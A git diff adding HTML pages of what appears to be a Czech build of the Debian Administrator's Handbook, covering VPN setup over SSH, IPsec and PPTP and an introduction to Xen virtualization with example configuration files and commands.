+                href="sect.network-config.html#sect.roaming-network-config">8.2.5 – „Automatic Network Configuration for Roaming Users“</a>) that allows managing OpenVPN virtual private networks. This allows every user to configure OpenVPN connections graphically and to control them from the network management icon. <a
+                id="id-1.13.5.7.8.4.3"
+                class="indexterm"></a>
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ssh-vpn"></a>10.2.2. Virtual Private Network with SSH</h3></div></div></div><a
+            id="id-1.13.5.8.2"
+            class="indexterm"></a><a
+            id="id-1.13.5.8.3"
+            class="indexterm"></a><div
+            class="para">
+				There are actually two ways of creating a virtual private network with SSH. The historic one involves establishing a PPP layer over the SSH link. This method is described in a HOWTO document: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.tldp.org/HOWTO/ppp-ssh/">http://www.tldp.org/HOWTO/ppp-ssh/</a></div>
+			</div><div
+            class="para">
+				The second method is more recent, and was introduced with OpenSSH 4.3; it is now possible for OpenSSH to create virtual network interfaces (<code
+              class="literal">tun*</code>) on both sides of an SSH connection, and these virtual interfaces can be configured exactly as if they were physical interfaces. The tunneling system must first be enabled by setting <code
+              class="literal">PermitTunnel</code> to “yes” in the SSH server configuration file (<code
+              class="filename">/etc/ssh/sshd_config</code>). When establishing the SSH connection, the creation of a tunnel must be explicitly requested with the <code
+              class="literal">-w any:any</code> option (<code
+              class="literal">any</code> can be replaced with the desired <code
+              class="literal">tun</code> device number). This requires the user to have administrator privilege on both sides, so as to be able to create the network device (in other words, the connection must be established as root).
+			</div><div
+            class="para">
+				Both methods for creating a virtual private network over SSH are quite straightforward. However, the VPN they provide is not the most efficient available; in particular, it does not handle high levels of traffic very well.
+			</div><div
+            class="para">
+				The explanation is that when a TCP/IP stack is encapsulated within a TCP/IP connection (for SSH), the TCP protocol is used twice, once for the SSH connection and once within the tunnel. This leads to problems, especially due to the way TCP adapts to network conditions by altering timeout delays. The following site describes the problem in more detail: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://sites.inka.de/sites/bigred/devel/tcp-tcp.html">http://sites.inka.de/sites/bigred/devel/tcp-tcp.html</a></div> VPNs over SSH should therefore be restricted to one-off tunnels with no performance constraints.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ipsec"></a>10.2.3. IPsec</h3></div></div></div><a
+            id="id-1.13.5.9.2"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.3"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.4"
+            class="indexterm"></a><div
+            class="para">
+				IPsec, despite being the standard in IP VPNs, is rather more involved in its implementation. The IPsec engine itself is integrated in the Linux kernel; the required user-space parts, the control and configuration tools, are provided by the <span
+              class="pkg pkg">ipsec-tools</span> package. In concrete terms, each host's <code
+              class="filename">/etc/ipsec-tools.conf</code> contains the parameters for <span
+              class="emphasis"><em>IPsec tunnels</em></span> (or <span
+              class="emphasis"><em>Security Associations</em></span>, in the IPsec terminology) that the host is concerned with; the <code
+              class="command">/etc/init.d/setkey</code> script provides a way to start and stop a tunnel (each tunnel is a secure link to another host connected to the virtual private network). This file can be built by hand from the documentation provided by the <span
+              class="citerefentry"><span
+                class="refentrytitle">setkey</span>(8)</span> manual page. However, explicitly writing the parameters for all hosts in a non-trivial set of machines quickly becomes an arduous task, since the number of tunnels grows fast. Installing an IKE daemon (for <span
+              class="emphasis"><em>IPsec Key Exchange</em></span>) such as <span
+              class="pkg pkg">racoon</span> or <span
+              class="pkg pkg">strongswan</span> makes the process much simpler by bringing administration together at a central point, and more secure by rotating the keys periodically.
+			</div><a
+            id="id-1.13.5.9.6"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.7"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.8"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.9"
+            class="indexterm"></a><div
+            class="para">
+				In spite of its status as the reference, the complexity of setting up IPsec restricts its usage in practice. OpenVPN-based solutions will generally be preferred when the required tunnels are neither too many nor too dynamic.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> IPsec and NAT</strong></p></div></div></div><div
+              class="para">
+				NATing firewalls and IPsec do not work well together: since IPsec signs the packets, any change on these packets that the firewall might perform will void the signature, and the packets will be rejected at their destination. Various IPsec implementations now include the <span
+                class="emphasis"><em>NAT-T</em></span> technique (for <span
+                class="emphasis"><em>NAT Traversal</em></span>), which basically encapsulates the IPsec packet within a standard UDP packet.
+			</div><a
+              id="id-1.13.5.9.11.3"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.11.4"
+              class="indexterm"></a></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> IPsec and firewalls</strong></p></div></div></div><div
+              class="para">
+				The standard mode of operation of IPsec involves data exchanges on UDP port 500 for key exchanges (also on UDP port 4500 in the case that NAT-T is in use). Moreover, IPsec packets use two dedicated IP protocols that the firewall must let through; reception of these packets is based on their protocol numbers, 50 (ESP) and 51 (AH).
+			</div><a
+              id="id-1.13.5.9.12.3"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.12.4"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.12.5"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.12.6"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.pptp"></a>10.2.4. PPTP</h3></div></div></div><div
+            class="para">
+				PPTP (for <span
+              class="emphasis"><em>Point-to-Point Tunneling Protocol</em></span>) uses two communication channels, one for control data and one for payload data; the latter uses the GRE protocol (<span
+              class="emphasis"><em>Generic Routing Encapsulation</em></span>). A standard PPP link is then set up over the data exchange channel.
+			</div><a
+            id="id-1.13.5.10.3"
+            class="indexterm"></a><a
+            id="id-1.13.5.10.4"
+            class="indexterm"></a><a
+            id="id-1.13.5.10.5"
+            class="indexterm"></a><a
+            id="id-1.13.5.10.6"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.pptp-config-client"></a>10.2.4.1. Configuring the Client</h4></div></div></div><div
+              class="para">
+					The <span
+                class="pkg pkg">pptp-linux</span> package contains an easily-configured PPTP client for Linux. The following instructions take their inspiration from the official documentation: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://pptpclient.sourceforge.net/howto-debian.phtml">http://pptpclient.sourceforge.net/howto-debian.phtml</a></div>
+				</div><a
+              id="id-1.13.5.10.7.3"
+              class="indexterm"></a><div
+              class="para">
+					The Falcot administrators created several files: <code
+                class="filename">/etc/ppp/options.pptp</code>, <code
+                class="filename">/etc/ppp/peers/falcot</code>, <code
+                class="filename">/etc/ppp/ip-up.d/falcot</code>, and <code
+                class="filename">/etc/ppp/ip-down.d/falcot</code>.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-options.pptp"></a><p
+                class="title"><strong>Příklad 10.2. The <code
+                    class="filename">/etc/ppp/options.pptp</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# PPP options used for a PPTP connection
+lock
+noauth
+nobsdcomp
+nodeflate
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-peers-falcot"></a><p
+                class="title"><strong>Příklad 10.3. The <code
+                    class="filename">/etc/ppp/peers/falcot</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# vpn.falcot.com is the PPTP server
+pty "pptp vpn.falcot.com --nolaunchpppd"
+# the connection will identify as the "vpn" user
+user vpn
+remotename pptp
+# encryption is needed
+require-mppe-128
+file /etc/ppp/options.pptp
+ipparam falcot
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-ip-up.d-falcot"></a><p
+                class="title"><strong>Příklad 10.4. The <code
+                    class="filename">/etc/ppp/ip-up.d/falcot</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Create the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route add -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-ip-down.d-falcot"></a><p
+                class="title"><strong>Příklad 10.5. The <code
+                    class="filename">/etc/ppp/ip-down.d/falcot</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Delete the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route del -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> MPPE</strong></p></div></div></div><div
+                class="para">
+					Securing PPTP involves using the MPPE feature (<span
+                  class="emphasis"><em>Microsoft Point-to-Point Encryption</em></span>), which is available in official Debian kernels as a module.
+				</div><a
+                id="id-1.13.5.10.7.9.3"
+                class="indexterm"></a><a
+                id="id-1.13.5.10.7.9.4"
+                class="indexterm"></a></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.pptp-config-serveur"></a>10.2.4.2. Configuring the Server</h4></div></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CAUTION</em></span> PPTP and firewalls</strong></p></div></div></div><div
+                class="para">
+					Intermediate firewalls need to be configured to let through IP packets using protocol 47 (GRE). Moreover, the PPTP server's port 1723 needs to be open so that the communication channel can happen.
+				</div></div><div
+              class="para">
+					<code
+                class="command">pptpd</code> is the PPTP server for Linux. Its main configuration file, <code
+                class="filename">/etc/pptpd.conf</code>, requires very few changes: <span
+                class="emphasis"><em>localip</em></span> (local IP address) and <span
+                class="emphasis"><em>remoteip</em></span> (remote IP address). In the example below, the PPTP server always uses the <code
+                class="literal">192.168.0.199</code> address, and PPTP clients receive IP addresses from <code
+                class="literal">192.168.0.200</code> to <code
+                class="literal">192.168.0.250</code>.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.pptpd.conf"></a><p
+                class="title"><strong>Příklad 10.6. The <code
+                    class="filename">/etc/pptpd.conf</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# TAG: speed
+#
+#       Specifies the speed for the PPP daemon to talk at.
+#
+speed 115200
+
+# TAG: option
+#
+#       Specifies the location of the PPP options file.
+#       By default PPP looks in '/etc/ppp/options'
+#
+option /etc/ppp/pptpd-options
+
+# TAG: debug
+#
+#       Turns on (more) debugging to syslog
+#
+# debug
+
+# TAG: localip
+# TAG: remoteip
+#
+#       Specifies the local and remote IP address ranges.
+#
+#       You can specify single IP addresses separated by commas or you can
+#       specify ranges, or both. For example:
+#
+#               192.168.0.234,192.168.0.245-249,192.168.0.254
+#
+#       IMPORTANT RESTRICTIONS:
+#
+#       1. No spaces are permitted between commas or within addresses.
+#
+#       2. If you give more IP addresses than MAX_CONNECTIONS, it will
+#          start at the beginning of the list and go until it gets
+#          MAX_CONNECTIONS IPs. Others will be ignored.
+#
+#       3. No shortcuts in ranges! ie. 234-8 does not mean 234 to 238,
+#          you must type 234-238 if you mean this.
+#
+#       4. If you give a single localIP, that's ok - all local IPs will
+#          be set to the given one. You MUST still give at least one remote
+#          IP for each simultaneous client.
+#
+#localip 192.168.0.234-238,192.168.0.245
+#remoteip 192.168.1.234-238,192.168.1.245
+#localip 10.0.1.1
+#remoteip 10.0.1.2-100
+localip 192.168.0.199
+remoteip 192.168.0.200-250
+</pre></div></div><div
+              class="para">
+					The PPP configuration used by the PPTP server also requires a few changes in <code
+                class="filename">/etc/ppp/pptpd-options</code>. The important parameters are the server name (<code
+                class="literal">pptp</code>), the domain name (<code
+                class="literal">falcot.com</code>), and the IP addresses for DNS and WINS servers.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-pptpd-options"></a><p
+                class="title"><strong>Příklad 10.7. The <code
+                    class="filename">/etc/ppp/pptpd-options</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+## turn pppd syslog debugging on
+#debug
+
+## change 'servername' to whatever you specify as your server name in chap-secrets
+name pptp
+## change the domainname to your local domain
+domain falcot.com
+
+## these are reasonable defaults for WinXXXX clients
+## for the security related settings
+# The Debian pppd package now supports both MSCHAP and MPPE, so enable them
+# here. Please note that the kernel support for MPPE must also be present!
+auth
+require-chap
+require-mschap
+require-mschap-v2
+require-mppe-128
+
+## Fill in your addresses
+ms-dns 192.168.0.1
+ms-wins 192.168.0.1
+
+## Fill in your netmask
+netmask 255.255.255.0
+
+## some defaults
+nodefaultroute
+proxyarp
+lock
+</pre></div></div><div
+              class="para">
+					The last step involves registering the <code
+                class="literal">vpn</code> user (and the associated password) in the <code
+                class="filename">/etc/ppp/chap-secrets</code> file. Contrary to other instances where an asterisk (<code
+                class="literal">*</code>) would work, the server name must be filled explicitly here. Furthermore, Windows PPTP clients identify themselves under the <code
+                class="literal"><em
+                  class="replaceable">DOMAIN</em>\\<em
+                  class="replaceable">USER</em></code> form, instead of only providing a user name. This explains why the file also mentions the <code
+                class="literal">FALCOT\\vpn</code> user. It is also possible to specify individual IP addresses for users; an asterisk in this field specifies that dynamic addressing should be used.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-chap-secrets"></a><p
+                class="title"><strong>Příklad 10.8. The <code
+                    class="filename">/etc/ppp/chap-secrets</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Secrets for authentication using CHAP
+# client        server  secret      IP addresses
+vpn             pptp    f@Lc3au     *
+FALCOT\\vpn     pptp    f@Lc3au     *
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> PPTP vulnerabilities</strong></p></div></div></div><div
+                class="para">
+					Microsoft's first PPTP implementation drew severe criticism because it had many security vulnerabilities; most have since then been fixed in more recent versions. The configuration documented in this section uses the latest version of the protocol. Be aware though that removing some options (such as <code
+                  class="literal">require-mppe-128</code> and <code
+                  class="literal">require-mschap-v2</code>) would make the service vulnerable again.
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-infrastructure.html"><strong>Předcházející</strong>Kapitola 10. Network Infrastructure</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quality-of-service.html"><strong>Další</strong>10.3. Quality of Service</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.virtualization.html b/tmp/cs-CZ/html/sect.virtualization.html
new file mode 100644
index 000000000..049d51701
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.virtualization.html
@@ -0,0 +1,1205 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">12.2. Virtualization</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="prev"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="next"
+        href="sect.automated-installation.html"
+        title="12.3. Automated Installation" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.virtualization.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="advanced-administration.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automated-installation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.virtualization"></a>12.2. Virtualization</h2></div></div></div><a
+          id="id-1.15.5.2"
+          class="indexterm"></a><div
+          class="para">
+			Virtualization is one of the most major advances in the recent years of computing. The term covers various abstractions and techniques simulating virtual computers with a variable degree of independence on the actual hardware. One physical server can then host several systems working at the same time and in isolation. Applications are many, and often derive from this isolation: test environments with varying configurations for instance, or separation of hosted services across different virtual machines for security.
+		</div><div
+          class="para">
+			There are multiple virtualization solutions, each with its own pros and cons. This book will focus on Xen, LXC, and KVM, but other noteworthy implementations include the following:
+		</div><a
+          id="id-1.15.5.5"
+          class="indexterm"></a><a
+          id="id-1.15.5.6"
+          class="indexterm"></a><a
+          id="id-1.15.5.7"
+          class="indexterm"></a><a
+          id="id-1.15.5.8"
+          class="indexterm"></a><a
+          id="id-1.15.5.9"
+          class="indexterm"></a><a
+          id="id-1.15.5.10"
+          class="indexterm"></a><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					QEMU is a software emulator for a full computer; performances are far from the speed one could achieve running natively, but this allows running unmodified or experimental operating systems on the emulated hardware. It also allows emulating a different hardware architecture: for instance, an <span
+                  class="emphasis"><em>amd64</em></span> system can emulate an <span
+                  class="emphasis"><em>arm</em></span> computer. QEMU is free software. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.qemu.org/">http://www.qemu.org/</a></div>
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					Bochs is another free virtual machine, but it only emulates the x86 architectures (i386 and amd64).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					VMWare is a proprietary virtual machine; being one of the oldest out there, it is also one of the most widely-known. It works on principles similar to QEMU. VMWare proposes advanced features such as snapshotting a running virtual machine. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.vmware.com/">http://www.vmware.com/</a></div>
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					VirtualBox is a virtual machine that is mostly free software (some extra components are available under a proprietary license). Unfortunately it is in Debian's “contrib” section because it includes some precompiled files that cannot be rebuilt without a proprietary compiler and it currently only resides in Debian Unstable as Oracle's policies make it impossible to keep it secure in a Debian stable release (see <a
+                  href="https://bugs.debian.org/794466">#794466</a>). While younger than VMWare and restricted to the i386 and amd64 architectures, it still includes some snapshotting and other interesting features. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.virtualbox.org/">http://www.virtualbox.org/</a></div>
+				</div></li></ul></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.xen"></a>12.2.1. Xen</h3></div></div></div><div
+            class="para">
+				Xen <a
+              id="id-1.15.5.12.2.1"
+              class="indexterm"></a> is a “paravirtualization” solution. It introduces a thin abstraction layer, called a “hypervisor”, between the hardware and the upper systems; this acts as a referee that controls access to hardware from the virtual machines. However, it only handles a few of the instructions, the rest is directly executed by the hardware on behalf of the systems. The main advantage is that performances are not degraded, and systems run close to native speed; the drawback is that the kernels of the operating systems one wishes to use on a Xen hypervisor need to be adapted to run on Xen.
+			</div><div
+            class="para">
+				Let's spend some time on terms. The hypervisor is the lowest layer, that runs directly on the hardware, even below the kernel. This hypervisor can split the rest of the software across several <span
+              class="emphasis"><em>domains</em></span>, which can be seen as so many virtual machines. One of these domains (the first one that gets started) is known as <span
+              class="emphasis"><em>dom0</em></span>, and has a special role, since only this domain can control the hypervisor and the execution of other domains. These other domains are known as <span
+              class="emphasis"><em>domU</em></span>. In other words, and from a user point of view, the <span
+              class="emphasis"><em>dom0</em></span> matches the “host” of other virtualization systems, while a <span
+              class="emphasis"><em>domU</em></span> can be seen as a “guest”.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Xen and the various versions of Linux</strong></p></div></div></div><div
+              class="para">
+				Xen was initially developed as a set of patches that lived out of the official tree, and not integrated to the Linux kernel. At the same time, several upcoming virtualization systems (including KVM) required some generic virtualization-related functions to facilitate their integration, and the Linux kernel gained this set of functions (known as the <span
+                class="emphasis"><em>paravirt_ops</em></span> or <span
+                class="emphasis"><em>pv_ops</em></span> interface). Since the Xen patches were duplicating some of the functionality of this interface, they couldn't be accepted officially.
+			</div><div
+              class="para">
+				Xensource, the company behind Xen, therefore had to port Xen to this new framework, so that the Xen patches could be merged into the official Linux kernel. That meant a lot of code rewrite, and although Xensource soon had a working version based on the paravirt_ops interface, the patches were only progressively merged into the official kernel. The merge was completed in Linux 3.0. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/XenParavirtOps">http://wiki.xenproject.org/wiki/XenParavirtOps</a></div>
+			</div><div
+              class="para">
+				Since <span
+                class="distribution distribution">Jessie</span> is based on version 3.16 of the Linux kernel, the standard <span
+                class="pkg pkg">linux-image-686-pae</span> and <span
+                class="pkg pkg">linux-image-amd64</span> packages include the necessary code, and the distribution-specific patching that was required for <span
+                class="distribution distribution">Squeeze</span> and earlier versions of Debian is no more. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/Xen_Kernel_Feature_Matrix">http://wiki.xenproject.org/wiki/Xen_Kernel_Feature_Matrix</a></div>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Architectures compatible with Xen</strong></p></div></div></div><div
+              class="para">
+				Xen is currently only available for the i386, amd64, arm64 and armhf architectures.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Xen and non-Linux kernels</strong></p></div></div></div><div
+              class="para">
+				Xen requires modifications to all the operating systems one wants to run on it; not all kernels have the same level of maturity in this regard. Many are fully-functional, both as dom0 and domU: Linux 3.0 and later, NetBSD 4.0 and later, and OpenSolaris. Others only work as a domU. You can check the status of each operating system in the Xen wiki: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/Dom0_Kernels_for_Xen">http://wiki.xenproject.org/wiki/Dom0_Kernels_for_Xen</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/DomU_Support_for_Xen">http://wiki.xenproject.org/wiki/DomU_Support_for_Xen</a></div>
+			</div><div
+              class="para">
+				However, if Xen can rely on the hardware functions dedicated to virtualization (which are only present in more recent processors), even non-modified operating systems can run as domU (including Windows).
+			</div></div><div
+            class="para">
+				Using Xen under Debian requires three components:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						The hypervisor itself. According to the available hardware, the appropriate package will be either <span
+                    class="pkg pkg">xen-hypervisor-4.4-amd64</span>, <span
+                    class="pkg pkg">xen-hypervisor-4.4-armhf</span>, or <span
+                    class="pkg pkg">xen-hypervisor-4.4-arm64</span>.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						A kernel that runs on that hypervisor. Any kernel more recent than 3.0 will do, including the 3.16 version present in <span
+                    class="distribution distribution">Jessie</span>.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						The i386 architecture also requires a standard library with the appropriate patches taking advantage of Xen; this is in the <span
+                    class="pkg pkg">libc6-xen</span> package.
+					</div></li></ul></div><div
+            class="para">
+				In order to avoid the hassle of selecting these components by hand, a few convenience packages (such as <span
+              class="pkg pkg">xen-linux-system-amd64</span>) have been made available; they all pull in a known-good combination of the appropriate hypervisor and kernel packages. The hypervisor also brings <span
+              class="pkg pkg">xen-utils-4.4</span>, which contains tools to control the hypervisor from the dom0. This in turn brings the appropriate standard library. During the installation of all that, configuration scripts also create a new entry in the Grub bootloader menu, so as to start the chosen kernel in a Xen dom0. Note however that this entry is not usually set to be the first one in the list, and will therefore not be selected by default. If that is not the desired behavior, the following commands will change it:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>mv /etc/grub.d/20_linux_xen /etc/grub.d/09_linux_xen
+</code></strong><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>update-grub
+</code></strong></pre><div
+            class="para">
+				Once these prerequisites are installed, the next step is to test the behavior of the dom0 by itself; this involves a reboot to the hypervisor and the Xen kernel. The system should boot in its standard fashion, with a few extra messages on the console during the early initialization steps.
+			</div><div
+            class="para">
+				Now is the time to actually install useful systems on the domU systems, using the tools from <span
+              class="pkg pkg">xen-tools</span>. This package provides the <code
+              class="command">xen-create-image</code> command, which largely automates the task. The only mandatory parameter is <code
+              class="literal">--hostname</code>, giving a name to the domU; other options are important, but they can be stored in the <code
+              class="filename">/etc/xen-tools/xen-tools.conf</code> configuration file, and their absence from the command line doesn't trigger an error. It is therefore important to either check the contents of this file before creating images, or to use extra parameters in the <code
+              class="command">xen-create-image</code> invocation. Important parameters of note include the following:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--memory</code>, to specify the amount of RAM dedicated to the newly created system;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--size</code> and <code
+                    class="literal">--swap</code>, to define the size of the “virtual disks” available to the domU;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--debootstrap</code>, to cause the new system to be installed with <code
+                    class="command">debootstrap</code>; in that case, the <code
+                    class="literal">--dist</code> option will also most often be used (with a distribution name such as <span
+                    class="distribution distribution">jessie</span>).
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>GOING FURTHER</em></span> Installing a non-Debian system in a domU</strong></p></div></div></div><div
+                    class="para">
+						In case of a non-Linux system, care should be taken to define the kernel the domU must use, using the <code
+                      class="literal">--kernel</code> option.
+					</div></div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--dhcp</code> states that the domU's network configuration should be obtained by DHCP while <code
+                    class="literal">--ip</code> allows defining a static IP address.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Lastly, a storage method must be chosen for the images to be created (those that will be seen as hard disk drives from the domU). The simplest method, corresponding to the <code
+                    class="literal">--dir</code> option, is to create one file on the dom0 for each device the domU should be provided. For systems using LVM, the alternative is to use the <code
+                    class="literal">--lvm</code> option, followed by the name of a volume group; <code
+                    class="command">xen-create-image</code> will then create a new logical volume inside that group, and this logical volume will be made available to the domU as a hard disk drive.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>NOTE</em></span> Storage in the domU</strong></p></div></div></div><div
+                    class="para">
+						Entire hard disks can also be exported to the domU, as well as partitions, RAID arrays or pre-existing LVM logical volumes. These operations are not automated by <code
+                      class="command">xen-create-image</code>, however, so editing the Xen image's configuration file is in order after its initial creation with <code
+                      class="command">xen-create-image</code>.
+					</div></div></li></ul></div><div
+            class="para">
+				Once these choices are made, we can create the image for our future Xen domU:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>xen-create-image --hostname testxen --dhcp --dir /srv/testxen --size=2G --dist=jessie --role=udev</code></strong>
+<code
+              class="computeroutput">
+[...]
+General Information
+--------------------
+Hostname       :  testxen
+Distribution   :  jessie
+Mirror         :  http://ftp.debian.org/debian/
+Partitions     :  swap            128Mb (swap)
+                  /               2G    (ext3)
+Image type     :  sparse
+Memory size    :  128Mb
+Kernel path    :  /boot/vmlinuz-3.16.0-4-amd64
+Initrd path    :  /boot/initrd.img-3.16.0-4-amd64
+[...]
+Logfile produced at:
+         /var/log/xen-tools/testxen.log
+
+Installation Summary
+---------------------
+Hostname        :  testxen
+Distribution    :  jessie
+MAC Address     :  00:16:3E:8E:67:5C
